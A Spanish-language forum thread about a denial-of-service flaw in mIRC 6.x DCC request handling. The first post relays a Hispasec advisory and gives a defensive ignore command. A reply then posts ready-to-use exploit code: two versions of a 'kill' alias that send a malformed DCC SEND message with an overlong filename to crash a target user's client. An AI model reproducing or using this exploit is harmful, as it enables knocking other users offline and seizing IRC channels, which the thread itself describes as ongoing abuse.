Denegación de servicio en mIRC

[Sn@ke]

Se ha descubierto una nueva vulnerabilidad en mIRC, que puede ser
explotada para provocar una denegación de servicio durante una
comunicación por DCC.

mIRC es uno de los clientes de IRC (Internet Relay Chat) para entornos
Windows más populares entre los usuarios de dicho servicio y DCC es un
protocolo utilizado para el intercambio de archivos con otros usuarios
a través de IRC.

La vulnerabilidad descubierta se debe a un error durante el proceso
peticiones DCC, que puede ser explotado para interrumpir la ejecución
del cliente del usuario. No se ha querido dar una información más
detallada acerca de la naturaleza del problema que permite este
ataque, aunque se sabe que acepta a todas las versiones 6.x, incluida
la recientemente lanzada 6.11.

Se tiene constancia de que hay código de explotación de esta
vulnerabilidad circulando por la red, y que está siendo utilizado de
forma activa contra canales (tirando a todos los ops para conseguir
hacerse con ellos) y usuarios.

El autor del cliente de IRC ha sido informado de dicha vulnerabilidad,
pero mientras una actualización salga a la luz, se recomienda ignorar
las peticiones DCC de todos los usuarios excepto de los de confianza.
Si se quiere cortar por lo sano, se pueden ignorar todas las
peticiones DCC, con tan sólo escribir este comando:
/ignore -wd *
FUENTE DE LA NOTICIA : WWW.HISPASEC.COM

[TseTse]

kill { raw -q privmsg $1 : $+ $chr(1) $+ DCC SEND "a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5 6 7 8 9 0 1 2 3 4 " 1 2 3 $longip(127.0.0.1) 1111 $+ $chr(1) }


/alias kill /eval /quote privmsg $0 :\x01DCC SEND "a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5 6 7 8 9 0 1 2 3 4 " 1 2 3 2130706433 1111\x01

TseTse